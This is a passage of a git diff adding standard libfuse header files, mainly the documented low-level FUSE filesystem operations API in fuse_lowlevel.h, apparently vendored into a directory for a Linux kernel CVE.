message handler function or NULL to revert to + * the default + */ +void fuse_set_log_func(fuse_log_func_t func); + +/** + * Emit a log message + * + * @param level severity level (FUSE_LOG_ERR, FUSE_LOG_DEBUG, etc) + * @param fmt sprintf-style format string including newline + */ +void fuse_log(enum fuse_log_level level, const char *fmt, ...); + +#ifdef __cplusplus +} +#endif + +#endif /* FUSE_LOG_H_ */ diff --git a/cve/linux-kernel/2022/CVE-2022-27666/libfuse/fuse_lowlevel.h b/cve/linux-kernel/2022/CVE-2022-27666/libfuse/fuse_lowlevel.h new file mode 100644 index 0000000000000000000000000000000000000000..d73e9facc844c1718fefa4fe14c0274d45f309b2 --- /dev/null +++ b/cve/linux-kernel/2022/CVE-2022-27666/libfuse/fuse_lowlevel.h @@ -0,0 +1,2100 @@ +/* + FUSE: Filesystem in Userspace + Copyright (C) 2001-2007 Miklos Szeredi + + This program can be distributed under the terms of the GNU LGPLv2. + See the file COPYING.LIB. +*/ + +#ifndef FUSE_LOWLEVEL_H_ +#define FUSE_LOWLEVEL_H_ + +/** @file + * + * Low level API + * + * IMPORTANT: you should define FUSE_USE_VERSION before including this + * header. To use the newest API define it to 35 (recommended for any + * new application). + */ + +#ifndef FUSE_USE_VERSION +#error FUSE_USE_VERSION not defined +#endif + +#include "fuse_common.h" + +#include +#include +#include +#include +#include +#include + +#ifdef __cplusplus +extern "C" { +#endif + +/* ----------------------------------------------------------- * + * Miscellaneous definitions * + * ----------------------------------------------------------- */ + +/** The node ID of the root inode */ +#define FUSE_ROOT_ID 1 + +/** Inode number type */ +typedef uint64_t fuse_ino_t; + +/** Request pointer type */ +typedef struct fuse_req *fuse_req_t; + +/** + * Session + * + * This provides hooks for processing requests, and exiting + */ +struct fuse_session; + +/** Directory entry parameters supplied to fuse_reply_entry() */ +struct fuse_entry_param { + /** Unique inode number + * + * In lookup, zero means negative entry (from version 2.5) + * Returning ENOENT also means negative entry, but by setting zero + * ino the kernel may cache negative entries for entry_timeout + * seconds. + */ + fuse_ino_t ino; + + /** Generation number for this entry. + * + * If the file system will be exported over NFS, the + * ino/generation pairs need to be unique over the file + * system's lifetime (rather than just the mount time). So if + * the file system reuses an inode after it has been deleted, + * it must assign a new, previously unused generation number + * to the inode at the same time. + * + */ + uint64_t generation; + + /** Inode attributes. + * + * Even if attr_timeout == 0, attr must be correct. For example, + * for open(), FUSE uses attr.st_size from lookup() to determine + * how many bytes to request. If this value is not correct, + * incorrect data will be returned. + */ + struct stat attr; + + /** Validity timeout (in seconds) for inode attributes. If + attributes only change as a result of requests that come + through the kernel, this should be set to a very large + value. */ + double attr_timeout; + + /** Validity timeout (in seconds) for the name. If directory + entries are changed/deleted only as a result of requests + that come through the kernel, this should be set to a very + large value. */ + double entry_timeout; +}; + +/** + * Additional context associated with requests. + * + * Note that the reported client uid, gid and pid may be zero in some + * situations. For example, if the FUSE file system is running in a + * PID or user namespace but then accessed from outside the namespace, + * there is no valid uid/pid/gid that could be reported. + */ +struct fuse_ctx { + /** User ID of the calling process */ + uid_t uid; + + /** Group ID of the calling process */ + gid_t gid; + + /** Thread ID of the calling process */ + pid_t pid; + + /** Umask of the calling process */ + mode_t umask; +}; + +struct fuse_forget_data { + fuse_ino_t ino; + uint64_t nlookup; +}; + +/* 'to_set' flags in setattr */ +#define FUSE_SET_ATTR_MODE (1 << 0) +#define FUSE_SET_ATTR_UID (1 << 1) +#define FUSE_SET_ATTR_GID (1 << 2) +#define FUSE_SET_ATTR_SIZE (1 << 3) +#define FUSE_SET_ATTR_ATIME (1 << 4) +#define FUSE_SET_ATTR_MTIME (1 << 5) +#define FUSE_SET_ATTR_ATIME_NOW (1 << 7) +#define FUSE_SET_ATTR_MTIME_NOW (1 << 8) +#define FUSE_SET_ATTR_CTIME (1 << 10) + +/* ----------------------------------------------------------- * + * Request methods and replies * + * ----------------------------------------------------------- */ + +/** + * Low level filesystem operations + * + * Most of the methods (with the exception of init and destroy) + * receive a request handle (fuse_req_t) as their first argument. + * This handle must be passed to one of the specified reply functions. + * + * This may be done inside the method invocation, or after the call + * has returned. The request handle is valid until one of the reply + * functions is called. + * + * Other pointer arguments (name, fuse_file_info, etc) are not valid + * after the call has returned, so if they are needed later, their + * contents have to be copied. + * + * In general, all methods are expected to perform any necessary + * permission checking. However, a filesystem may delegate this task + * to the kernel by passing the `default_permissions` mount option to + * `fuse_session_new()`. In this case, methods will only be called if + * the kernel's permission check has succeeded. + * + * The filesystem sometimes needs to handle a return value of -ENOENT + * from the reply function, which means, that the request was + * interrupted, and the reply discarded. For example if + * fuse_reply_open() return -ENOENT means, that the release method for + * this file will not be called. + */ +struct fuse_lowlevel_ops { + /** + * Initialize filesystem + * + * This function is called when libfuse establishes + * communication with the FUSE kernel module. The file system + * should use this module to inspect and/or modify the + * connection parameters provided in the `conn` structure. + * + * Note that some parameters may be overwritten by options + * passed to fuse_session_new() which take precedence over the + * values set in this handler. + * + * There's no reply to this function + * + * @param userdata the user data passed to fuse_session_new() + */ + void (*init) (void *userdata, struct fuse_conn_info *conn); + + /** + * Clean up filesystem. + * + * Called on filesystem exit. When this method is called, the + * connection to the kernel may be gone already, so that eg. calls + * to fuse_lowlevel_notify_* will fail. + * + * There's no reply to this function + * + * @param userdata the user data passed to fuse_session_new() + */ + void (*destroy) (void *userdata); + + /** + * Look up a directory entry by name and get its attributes. + * + * Valid replies: + * fuse_reply_entry + * fuse_reply_err + * + * @param req request handle + * @param parent inode number of the parent directory + * @param name the name to look up + */ + void (*lookup) (fuse_req_t req, fuse_ino_t parent, const char *name); + + /** + * Forget about an inode + * + * This function is called when the kernel removes an inode + * from its internal caches. + * + * The inode's lookup count increases by one for every call to + * fuse_reply_entry and fuse_reply_create. The nlookup parameter + * indicates by how much the lookup count should be decreased. + * + * Inodes with a non-zero lookup count may receive request from + * the kernel even after calls to unlink, rmdir or (when + * overwriting an existing file) rename. Filesystems must handle + * such requests properly and it is recommended to defer removal + * of the inode until the lookup count reaches zero. Calls to + * unlink, rmdir or rename will be followed closely by forget + * unless the file or directory is open, in which case the + * kernel issues forget only after the release or releasedir + * calls. + * + * Note that if a file system will be exported over NFS the + * inodes lifetime must extend even beyond forget. See the + * generation field in struct fuse_entry_param above. + * + * On unmount the lookup count for all inodes implicitly drops + * to zero. It is not guaranteed that the file system will + * receive corresponding forget messages for the affected + * inodes. + * + * Valid replies: + * fuse_reply_none + * + * @param req request handle + * @param ino the inode number + * @param nlookup the number of lookups to forget + */ + void (*forget) (fuse_req_t req, fuse_ino_t ino, uint64_t nlookup); + + /** + * Get file attributes. + * + * If writeback caching is enabled, the kernel may have a + * better idea of a file's length than the FUSE file system + * (eg if there has been a write that extended the file size, + * but that has not yet been passed to the filesystem.n + * + * In this case, the st_size value provided by the file system + * will be ignored. + * + * Valid replies: + * fuse_reply_attr + * fuse_reply_err + * + * @param req request handle + * @param ino the inode number + * @param fi for future use, currently always NULL + */ + void (*getattr) (fuse_req_t req, fuse_ino_t ino, + struct fuse_file_info *fi); + + /** + * Set file attributes + * + * In the 'attr' argument only members indicated by the 'to_set' + * bitmask contain valid values. Other members contain undefined + * values. + * + * Unless FUSE_CAP_HANDLE_KILLPRIV is disabled, this method is + * expected to reset the setuid and setgid bits if the file + * size or owner is being changed. + * + * If the setattr was invoked from the ftruncate() system call + * under Linux kernel versions 2.6.15 or later, the fi->fh will + * contain the value set by the open method or will be undefined + * if the open method didn't set any value. Otherwise (not + * ftruncate call, or kernel version earlier than 2.6.15) the fi + * parameter will be NULL. + * + * Valid replies: + * fuse_reply_attr + * fuse_reply_err + * + * @param req request handle + * @param ino the inode number + * @param attr the attributes + * @param to_set bit mask of attributes which should be set + * @param fi file information, or NULL + */ + void (*setattr) (fuse_req_t req, fuse_ino_t ino, struct stat *attr, + int to_set, struct fuse_file_info *fi); + + /** + * Read symbolic link + * + * Valid replies: + * fuse_reply_readlink + * fuse_reply_err + * + * @param req request handle + * @param ino the inode number + */ + void (*readlink) (fuse_req_t req, fuse_ino_t ino); + + /** + * Create file node + * + * Create a regular file, character device, block device, fifo or + * socket node. + * + * Valid replies: + * fuse_reply_entry + * fuse_reply_err + * + * @param req request handle + * @param parent inode number of the parent directory + * @param name to create + * @param mode file type and mode with which to create the new file + * @param rdev the device number (only valid if created file is a device) + */ + void (*mknod) (fuse_req_t req, fuse_ino_t parent, const char *name, + mode_t mode, dev_t rdev); + + /** + * Create a directory + * + * Valid replies: + * fuse_reply_entry + * fuse_reply_err + * + * @param req request handle + * @param parent inode number of the parent directory + * @param name to create + * @param mode with which to create the new file + */ + void (*mkdir) (fuse_req_t req, fuse_ino_t parent, const char *name, + mode_t mode); + + /** + * Remove a file + * + * If the file's inode's lookup count is non-zero, the file + * system is expected to postpone any removal of the inode + * until the lookup count reaches zero (see description of the + * forget function). + * + * Valid replies: + * fuse_reply_err + * + * @param req request handle + * @param parent inode number of the parent directory + * @param name to remove + */ + void (*unlink) (fuse_req_t req, fuse_ino_t parent, const char *name); + + /** + * Remove a directory + * + * If the directory's inode's lookup count is non-zero, the + * file system is expected to postpone any removal of the + * inode until the lookup count reaches zero (see description + * of the forget function). + * + * Valid replies: + * fuse_reply_err + * + * @param req request handle + * @param parent inode number of the parent directory + * @param name to remove + */ + void (*rmdir) (fuse_req_t req, fuse_ino_t parent, const char *name); + + /** + * Create a symbolic link + * + * Valid replies: + * fuse_reply_entry + * fuse_reply_err + * + * @param req request handle + * @param link the contents of the symbolic link + * @param parent inode number of the parent directory + * @param name to create + */ + void (*symlink) (fuse_req_t req, const char *link, fuse_ino_t parent, + const char *name); + + /** Rename a file + * + * If the target exists it should be atomically replaced. If + * the target's inode's lookup count is non-zero, the file + * system is expected to postpone any removal of the inode + * until the lookup count reaches zero (see description of the + * forget function). + * + * If this request is answered with an error code of ENOSYS, this is + * treated as a permanent failure with error code EINVAL, i.e. all + * future bmap requests will fail with EINVAL without being + * send to the filesystem process. + * + * *flags* may be `RENAME_EXCHANGE` or `RENAME_NOREPLACE`. If + * RENAME_NOREPLACE is specified, the filesystem must not + * overwrite *newname* if it exists and return an error + * instead. If `RENAME_EXCHANGE` is specified, the filesystem + * must atomically exchange the two files, i.e. both must + * exist and neither may be deleted. + * + * Valid replies: + * fuse_reply_err + * + * @param req request handle + * @param parent inode number of the old parent directory + * @param name old name + * @param newparent inode number of the new parent directory + * @param newname new name + */ + void (*rename) (fuse_req_t req, fuse_ino_t parent, const char *name, + fuse_ino_t newparent, const char *newname, + unsigned int flags); + + /** + * Create a hard link + * + * Valid replies: + * fuse_reply_entry + * fuse_reply_err + * + * @param req request handle + * @param ino the old inode number + * @param newparent inode number of the new parent directory + * @param newname new name to create + */ + void (*link) (fuse_req_t req, fuse_ino_t ino, fuse_ino_t newparent, + const char *newname); + + /** + * Open a file + * + * Open flags are available in fi->flags. The following rules + * apply. + * + * - Creation (O_CREAT, O_EXCL, O_NOCTTY) flags will be + * filtered out / handled by the kernel. + * + * - Access modes (O_RDONLY, O_WRONLY, O_RDWR) should be used + * by the filesystem to check if the operation is + * permitted. If the ``-o default_permissions`` mount + * option is given, this check is already done by the + * kernel before calling open() and may thus be omitted by + * the filesystem. + * + * - When writeback caching is enabled, the kernel may send + * read requests even for files opened with O_WRONLY. The + * filesystem should be prepared to handle this. + * + * - When writeback caching is disabled, the filesystem is + * expected to properly handle the O_APPEND flag and ensure + * that each write is appending to the end of the file. + * + * - When writeback caching is enabled, the kernel will + * handle O_APPEND. However, unless all changes to the file + * come through the kernel this will not work reliably. The + * filesystem should thus either ignore the O_APPEND flag + * (and let the kernel handle it), or return an error + * (indicating that reliably O_APPEND is not available). + * + * Filesystem may store an arbitrary file handle (pointer, + * index, etc) in fi->fh, and use this in other all other file + * operations (read, write, flush, release, fsync). + * + * Filesystem may also implement stateless file I/O and not store + * anything in fi->fh. + * + * There are also some flags (direct_io, keep_cache) which the + * filesystem may set in fi, to change the way the file is opened. + * See fuse_file_info structure in for more details. + * + * If this request is answered with an error code of ENOSYS + * and FUSE_CAP_NO_OPEN_SUPPORT is set in + * `fuse_conn_info.capable`, this is treated as success and + * future calls to open and release will also succeed without being + * sent to the filesystem process. + * + * Valid replies: + * fuse_reply_open + * fuse_reply_err + * + * @param req request handle + * @param ino the inode number + * @param fi file information + */ + void (*open) (fuse_req_t req, fuse_ino_t ino, + struct fuse_file_info *fi); + + /** + * Read data + * + * Read should send exactly the number of bytes requested except + * on EOF or error, otherwise the rest of the data will be + * substituted with zeroes. An exception to this is when the file + * has been opened in 'direct_io' mode, in which case the return + * value of the read system call will reflect the return value of + * this operation. + * + * fi->fh will contain the value set by the open method, or will + * be undefined if the open method didn't set any value. + * + * Valid replies: + * fuse_reply_buf + * fuse_reply_iov + * fuse_reply_data + * fuse_reply_err + * + * @param req request handle + * @param ino the inode number + * @param size number of bytes to read + * @param off offset to read from + * @param fi file information + */ + void (*read) (fuse_req_t req, fuse_ino_t ino, size_t size, off_t off, + struct fuse_file_info *fi); + + /** + * Write data + * + * Write should return exactly the number of bytes requested + * except on error. An exception to this is when the file has + * been opened in 'direct_io' mode, in which case the return value + * of the write system call will reflect the return value of this + * operation. + * + * Unless FUSE_CAP_HANDLE_KILLPRIV is disabled, this method is + * expected to reset the setuid and setgid bits. + * + * fi->fh will contain the value set by the open method, or will + * be undefined if the open method didn't set any value. + * + * Valid replies: + * fuse_reply_write + * fuse_reply_err + * + * @param req request handle + * @param ino the inode number + * @param buf data to write + * @param size number of bytes to write + * @param off offset to write to + * @param fi file information + */ + void (*write) (fuse_req_t req, fuse_ino_t ino, const char *buf, + size_t size, off_t off, struct fuse_file_info *fi); + + /** + * Flush method + * + * This is called on each close() of the opened file. + * + * Since file descriptors can be duplicated (dup, dup2, fork), for + * one open call there may be many flush calls. + * + * Filesystems shouldn't assume that flush will always be called + * after some writes, or that if will be called at all. + * + * fi->fh will contain the value set by the open method, or will + * be undefined if the open method didn't set any value. + * + * NOTE: the name of the method is misleading, since (unlike + * fsync) the filesystem is not forced to flush pending writes. + * One reason to flush data is if the filesystem wants to return + * write errors during close. However, such use is non-portable + * because POSIX does not require [close] to wait for delayed I/O to + * complete. + * + * If the filesystem supports file locking operations (setlk, + * getlk) it should remove all locks belonging to 'fi->owner'. + * + * If this request is answered with an error code of ENOSYS, + * this is treated as success and future calls to flush() will + * succeed automatically without being send to the filesystem + * process. + * + * Valid replies: + * fuse_reply_err + * + * @param req request handle + * @param ino the inode number + * @param fi file information + * + * [close]: http://pubs.opengroup.org/onlinepubs/9699919799/functions/close.html + */ + void (*flush) (fuse_req_t req, fuse_ino_t ino, + struct fuse_file_info *fi); + + /** + * Release an open file + * + * Release is called when there are no more references to an open + * file: all file descriptors are closed and all memory mappings + * are unmapped. + * + * For every open call there will be exactly one release call (unless + * the filesystem is force-unmounted). + * + * The filesystem may reply with an error, but error values are + * not returned to close() or munmap() which triggered the + * release. + * + * fi->fh will contain the value set by the open method, or will + * be undefined if the open method didn't set any value. + * fi->flags will contain the same flags as for open. + * + * Valid replies: + * fuse_reply_err + * + * @param req request handle + * @param ino the inode number + * @param fi file information + */ + void (*release) (fuse_req_t req, fuse_ino_t ino, + struct fuse_file_info *fi); + + /** + * Synchronize file contents + * + * If the datasync parameter is non-zero, then only the user data + * should be flushed, not the meta data. + * + * If this request is answered with an error code of ENOSYS, + * this is treated as success and future calls to fsync() will + * succeed automatically without being send to the filesystem + * process. + * + * Valid replies: + * fuse_reply_err + * + * @param req request handle + * @param ino the inode number + * @param datasync flag indicating if only data should be flushed + * @param fi file information + */ + void (*fsync) (fuse_req_t req, fuse_ino_t ino, int datasync, + struct fuse_file_info *fi); + + /** + * Open a directory + * + * Filesystem may store an arbitrary file handle (pointer, index, + * etc) in fi->fh, and use this in other all other directory + * stream operations (readdir, releasedir, fsyncdir). + * + * If this request is answered with an error code of ENOSYS and + * FUSE_CAP_NO_OPENDIR_SUPPORT is set in `fuse_conn_info.capable`, + * this is treated as success and future calls to opendir and + * releasedir will also succeed without being sent to the filesystem + * process. In addition, the kernel will cache readdir results + * as if opendir returned FOPEN_KEEP_CACHE | FOPEN_CACHE_DIR. + * + * Valid replies: + * fuse_reply_open + * fuse_reply_err + * + * @param req request handle + * @param ino the inode number + * @param fi file information + */ + void (*opendir) (fuse_req_t req, fuse_ino_t ino, + struct fuse_file_info *fi); + + /** + * Read directory + * + * Send a buffer filled using fuse_add_direntry(), with size not + * exceeding the requested size. Send an empty buffer on end of + * stream. + * + * fi->fh will contain the value set by the opendir method, or + * will be undefined if the opendir method didn't set any value. + * + * Returning a directory entry from readdir() does not affect + * its lookup count. + * + * If off_t is non-zero, then it will correspond to one of the off_t + * values that was previously returned by readdir() for the same + * directory handle. In this case, readdir() should skip over entries + * coming before the position defined by the off_t value. If entries + * are added or removed while the directory handle is open, the filesystem + * may still include the entries that have been removed, and may not + * report the entries that have been created. However, addition or + * removal of entries must never cause readdir() to skip over unrelated + * entries or to report them more than once. This means + * that off_t can not be a simple index that enumerates the entries + * that have been returned but must contain sufficient information to + * uniquely determine the next directory entry to return even when the + * set of entries is changing. + * + * The function does not have to report the '.' and '..' + * entries, but is allowed to do so. Note that, if readdir does + * not return '.' or '..', they will not be implicitly returned, + * and this behavior is observable by the caller. + * + * Valid replies: + * fuse_reply_buf + * fuse_reply_data + * fuse_reply_err + * + * @param req request handle + * @param ino the inode number + * @param size maximum number of bytes to send + * @param off offset to continue reading the directory stream + * @param fi file information + */ + void (*readdir) (fuse_req_t req, fuse_ino_t ino, size_t size, off_t off, + struct fuse_file_info *fi); + + /** + * Release an open directory + * + * For every opendir call there will be exactly one releasedir + * call (unless the filesystem is force-unmounted). + * + * fi->fh will contain the value set by the opendir method, or + * will be undefined if the opendir method didn't set any value. + * + * Valid replies: + * fuse_reply_err + * + * @param req request handle + * @param ino the inode number + * @param fi file information + */ + void (*releasedir) (fuse_req_t req, fuse_ino_t ino, + struct fuse_file_info *fi); + + /** + * Synchronize directory contents + * + * If the datasync parameter is non-zero, then only the directory + * contents should be flushed, not the meta data. + * + * fi->fh will contain the value set by the opendir method, or + * will be undefined if the opendir method didn't set any value. + * + * If this request is answered with an error code of ENOSYS, + * this is treated as success and future calls to fsyncdir() will + * succeed automatically without being send to the filesystem + * process. + * + * Valid replies: + * fuse_reply_err + * + * @param req request handle + * @param ino the inode number + * @param datasync flag indicating if only data should be flushed + * @param fi file information + */ + void (*fsyncdir) (fuse_req_t req, fuse_ino_t ino, int datasync, + struct fuse_file_info *fi); + + /** + * Get file system statistics + * + * Valid replies: + * fuse_reply_statfs + * fuse_reply_err + * + * @param req request handle + * @param ino the inode number, zero means "undefined" + */ + void (*statfs) (fuse_req_t req, fuse_ino_t ino); + + /** + * Set an extended attribute + * + * If this request is answered with an error code of ENOSYS, this is + * treated as a permanent failure with error code EOPNOTSUPP, i.e. all + * future setxattr() requests will fail with EOPNOTSUPP without being + * send to the filesystem process. + * + * Valid replies: + * fuse_reply_err + */ + void (*setxattr) (fuse_req_t req, fuse_ino_t ino, const char *name, + const char *value, size_t size, int flags); + + /** + * Get an extended attribute + * + * If size is zero, the size of the value should be sent with + * fuse_reply_xattr. + * + * If the size is non-zero, and the value fits in the buffer, the + * value should be sent with fuse_reply_buf. + * + * If the size is too small for the value, the ERANGE error should + * be sent. + * + * If this request is answered with an error code of ENOSYS, this is + * treated as a permanent failure with error code EOPNOTSUPP, i.e. all + * future getxattr() requests will fail with EOPNOTSUPP without being + * send to the filesystem process. + * + * Valid replies: + * fuse_reply_buf + * fuse_reply_data + * fuse_reply_xattr + * fuse_reply_err + * + * @param req request handle + * @param ino the inode number + * @param name of the extended attribute + * @param size maximum size of the value to send + */ + void (*getxattr) (fuse_req_t req, fuse_ino_t ino, const char *name, + size_t size); + + /** + * List extended attribute names + * + * If size is zero, the total size of the attribute list should be + * sent with fuse_reply_xattr. + * + * If the size is non-zero, and the null character separated + * attribute list fits in the buffer, the list should be sent with + * fuse_reply_buf. + * + * If the size is too small for the list, the ERANGE error should + * be sent. + * + * If this request is answered with an error code of ENOSYS, this is + * treated as a permanent failure with error code EOPNOTSUPP, i.e. all + * future listxattr() requests will fail with EOPNOTSUPP without being + * send to the filesystem process. + * + * Valid replies: + * fuse_reply_buf + * fuse_reply_data + * fuse_reply_xattr + * fuse_reply_err + * + * @param req request handle + * @param ino the inode number + * @param size maximum size of the list to send + */ + void (*listxattr) (fuse_req_t req, fuse_ino_t ino, size_t size); + + /** + * Remove an extended attribute + * + * If this request is answered with an error code of ENOSYS, this is + * treated as a permanent failure with error code EOPNOTSUPP, i.e. all + * future removexattr() requests will fail with EOPNOTSUPP without being + * send to the filesystem process. + * + * Valid replies: + * fuse_reply_err + * + * @param req request handle + * @param ino the inode number + * @param name of the extended attribute + */ + void (*removexattr) (fuse_req_t req, fuse_ino_t ino, const char *name); + + /** + * Check file access permissions + * + * This will be called for the access() and chdir() system + * calls. If the 'default_permissions' mount option is given, + * this method is not called. + * + * This method is not called under Linux kernel versions 2.4.x + * + * If this request is answered with an error code of ENOSYS, this is + * treated as a permanent success, i.e. this and all future access() + * requests will succeed without being send to the filesystem process. + * + * Valid replies: + * fuse_reply_err + * + * @param req request handle + * @param ino the inode number + * @param mask requested access mode + */ + void (*access) (fuse_req_t req, fuse_ino_t ino, int mask); + + /** + * Create and open a file + * + * If the file does not exist, first create it with the specified + * mode, and then open it. + * + * See the description of the open handler for more + * information. + * + * If this method is not implemented or under Linux kernel + * versions earlier than 2.6.15, the mknod() and open() methods + * will be called instead. + * + * If this request is answered with an error code of ENOSYS, the handler + * is treated as not implemented (i.e., for this and future requests the + * mknod() and open() handlers will be called instead). + * + * Valid replies: + * fuse_reply_create + * fuse_reply_err + * + * @param req request handle + * @param parent inode number of the parent directory + * @param name to create + * @param mode file type and mode with which to create the new file + * @param fi file information + */ + void (*create) (fuse_req_t req, fuse_ino_t parent, const char *name, + mode_t mode, struct fuse_file_info *fi); + + /** + * Test for a POSIX file lock + * + * Valid replies: + * fuse_reply_lock + * fuse_reply_err + * + * @param req request handle + * @param ino the inode number + * @param fi file information + * @param lock the region/type to test + */ + void (*getlk) (fuse_req_t req, fuse_ino_t ino, + struct fuse_file_info *fi, struct flock *lock); + + /** + * Acquire, modify or release a POSIX file lock + * + * For POSIX threads (NPTL) there's a 1-1 relation between pid and + * owner, but otherwise this is not always the case. For checking + * lock ownership, 'fi->owner' must be used. The l_pid field in + * 'struct flock' should only be used to fill in this field in + * getlk(). + * + * Note: if the locking methods are not implemented, the kernel + * will still allow file locking to work locally. Hence these are + * only interesting for network filesystems and similar. + * + * Valid replies: + * fuse_reply_err + * + * @param req request handle + * @param ino the inode number + * @param fi file information + * @param lock the region/type to set + * @param sleep locking operation may sleep + */ + void (*setlk) (fuse_req_t req, fuse_ino_t ino, + struct fuse_file_info *fi, + struct flock *lock, int sleep); + + /** + * Map block index within file to block index within device + * + * Note: This makes sense only for block device backed filesystems + * mounted with the 'blkdev' option + * + * If this request is answered with an error code of ENOSYS, this is + * treated as a permanent failure, i.e. all future bmap() requests will + * fail with the same error code without being send to the filesystem + * process. + * + * Valid replies: + * fuse_reply_bmap + * fuse_reply_err + * + * @param req request handle + * @param ino the inode number + * @param blocksize unit of block index + * @param idx block index within file + */ + void (*bmap) (fuse_req_t req, fuse_ino_t ino, size_t blocksize, + uint64_t idx); + +#if FUSE_USE_VERSION < 35 + void (*ioctl) (fuse_req_t req, fuse_ino_t ino, int cmd, + void *arg, struct fuse_file_info *fi, unsigned flags, + const void *in_buf, size_t in_bufsz, size_t out_bufsz); +#else + /** + * Ioctl + * + * Note: For unrestricted ioctls (not allowed for FUSE + * servers), data in and out areas can be discovered by giving + * iovs and setting FUSE_IOCTL_RETRY in *flags*. For + * restricted ioctls, kernel prepares in/out data area + * according to the information encoded in cmd. + * + * Valid replies: + * fuse_reply_ioctl_retry + * fuse_reply_ioctl + * fuse_reply_ioctl_iov + * fuse_reply_err + * + * @param req request handle + * @param ino the inode number + * @param cmd ioctl command + * @param arg ioctl argument + * @param fi file information + * @param flags for FUSE_IOCTL_* flags + * @param in_buf data fetched from the caller + * @param in_bufsz number of fetched bytes + * @param out_bufsz maximum size of output data + * + * Note : the unsigned long request submitted by the application + * is truncated to 32 bits. + */ + void (*ioctl) (fuse_req_t req, fuse_ino_t ino, unsigned int cmd, + void *arg, struct fuse_file_info *fi, unsigned flags, + const void *in_buf, size_t in_bufsz, size_t out_bufsz); +#endif + + /** + * Poll for IO readiness + * + * Note: If ph is non-NULL, the client should notify + * when IO readiness events occur by calling + * fuse_lowlevel_notify_poll() with the specified ph. + * + * Regardless of the number of times poll with a non-NULL ph + * is received, single notification is enough to clear all. + * Notifying more times incurs overhead but doesn't harm + * correctness. + * + * The callee is responsible for destroying ph with + * fuse_pollhandle_destroy() when no longer in use. + * + * If this request is answered with an error code of ENOSYS, this is + * treated as success (with a kernel-defined default poll-mask) and + * future calls to pull() will succeed the same way without being send + * to the filesystem process. + * + * Valid replies: + * fuse_reply_poll + * fuse_reply_err + * + * @param req request handle + * @param ino the inode number + * @param fi file information + * @param ph poll handle to be used for notification + */ + void (*poll) (fuse_req_t req, fuse_ino_t ino, struct fuse_file_info *fi, + struct fuse_pollhandle *ph); + + /** + * Write data made available in a buffer + * + * This is a more generic version of the ->write() method. If + * FUSE_CAP_SPLICE_READ is set in fuse_conn_info.want and the + * kernel supports splicing from the fuse device, then the + * data will be made available in pipe for supporting zero + * copy data transfer. + * + * buf->count is guaranteed to be one (and thus buf->idx is + * always zero). The write_buf handler must ensure that + * bufv->off is correctly updated (reflecting the number of + * bytes read from bufv->buf[0]). + * + * Unless FUSE_CAP_HANDLE_KILLPRIV is disabled, this method is + * expected to reset the setuid and setgid bits. + * + * Valid replies: + * fuse_reply_write + * fuse_reply_err + * + * @param req request handle + * @param ino the inode number + * @param bufv buffer containing the data + * @param off offset to write to + * @param fi file information + */ + void (*write_buf) (fuse_req_t req, fuse_ino_t ino, + struct fuse_bufvec *bufv, off_t off, + struct fuse_file_info *fi); + + /** + * Callback function for the retrieve request + * + * Valid replies: + * fuse_reply_none + * + * @param req request handle + * @param cookie user data supplied to fuse_lowlevel_notify_retrieve() + * @param ino the inode number supplied to fuse_lowlevel_notify_retrieve() + * @param offset the offset supplied to fuse_lowlevel_notify_retrieve() + * @param bufv the buffer containing the returned data + */ + void (*retrieve_reply) (fuse_req_t req, void *cookie, fuse_ino_t ino, + off_t offset, struct fuse_bufvec *bufv); + + /** + * Forget about multiple inodes + * + * See description of the forget function for more + * information. + * + * Valid replies: + * fuse_reply_none + * + * @param req request handle + */ + void (*forget_multi) (fuse_req_t req, size_t count, + struct fuse_forget_data *forgets); + + /** + * Acquire, modify or release a BSD file lock + * + * Note: if the locking methods are not implemented, the kernel + * will still allow file locking to work locally. Hence these are + * only interesting for network filesystems and similar. + * + * Valid replies: + * fuse_reply_err + * + * @param req request handle + * @param ino the inode number + * @param fi file information + * @param op the locking operation, see flock(2) + */ + void (*flock) (fuse_req_t req, fuse_ino_t ino, + struct fuse_file_info *fi, int op); + + /** + * Allocate requested space. If this function returns success then + * subsequent writes to the specified range shall not fail due to the lack + * of free space on the file system storage media. + * + * If this request is answered with an error code of ENOSYS, this is + * treated as a permanent failure with error code EOPNOTSUPP, i.e. all + * future fallocate() requests will fail with EOPNOTSUPP without being + * send to the filesystem process. + * + * Valid replies: + * fuse_reply_err + * + * @param req request handle + * @param ino the inode number + * @param offset starting point for allocated region + * @param length size of allocated region + * @param mode determines the operation to be performed on the given range, + * see fallocate(2) + */ + void (*fallocate) (fuse_req_t req, fuse_ino_t ino, int mode, + off_t offset, off_t length, struct fuse_file_info *fi); + + /** + * Read directory with attributes + * + * Send a buffer filled using fuse_add_direntry_plus(), with size not + * exceeding the requested size. Send an empty buffer on end of + * stream. + * + * fi->fh will contain the value set by the opendir method, or + * will be undefined if the opendir method didn't set any value. + * + * In contrast to readdir() (which does not affect the lookup counts), + * the lookup count of every entry returned by readdirplus(), except "." + * and "..", is incremented by one. + * + * Valid replies: + * fuse_reply_buf + * fuse_reply_data + * fuse_reply_err + * + * @param req request handle + * @param ino the inode number + * @param size maximum number of bytes to send + * @param off offset to continue reading the directory stream + * @param fi file information + */ + void (*readdirplus) (fuse_req_t req, fuse_ino_t ino, size_t size, off_t off, + struct fuse_file_info *fi); + + /** + * Copy a range of data from one file to another + * + * Performs an optimized copy between two file descriptors without the + * additional cost of transferring data through the FUSE kernel module + * to user space (glibc) and then back into the FUSE filesystem again. + * + * In case this method is not implemented, glibc falls back to reading + * data from the source and writing to the destination. Effectively + * doing an inefficient copy of the data. + * + * If this request is answered with an error code of ENOSYS, this is + * treated as a permanent failure with error code EOPNOTSUPP, i.e. all + * future copy_file_range() requests will fail with EOPNOTSUPP without + * being send to the filesystem process. + * + * Valid replies: + * fuse_reply_write + * fuse_reply_err + * + * @param req request handle + * @param ino_in the inode number or the source file + * @param off_in starting point from were the data should be read + * @param fi_in file information of the source file + * @param ino_out the inode number or the destination file + * @param off_out starting point where the data should be written + * @param fi_out file information of the destination file + * @param len maximum size of the data to copy + * @param flags passed along with the copy_file_range() syscall + */ + void (*copy_file_range) (fuse_req_t req, fuse_ino_t ino_in, + off_t off_in, struct fuse_file_info *fi_in, + fuse_ino_t ino_out, off_t off_out, + struct fuse_file_info *fi_out, size_t len, + int flags); + + /** + * Find next data or hole after the specified offset + * + * If this request is answered with an error code of ENOSYS, this is + * treated as a permanent failure, i.e. all future lseek() requests will + * fail with the same error code without being send to the filesystem + * process. + * + * Valid replies: + * fuse_reply_lseek + * fuse_reply_err + * + * @param req request handle + * @param ino the inode number + * @param off offset to start search from + * @param whence either SEEK_DATA or SEEK_HOLE + * @param fi file information + */ + void (*lseek) (fuse_req_t req, fuse_ino_t ino, 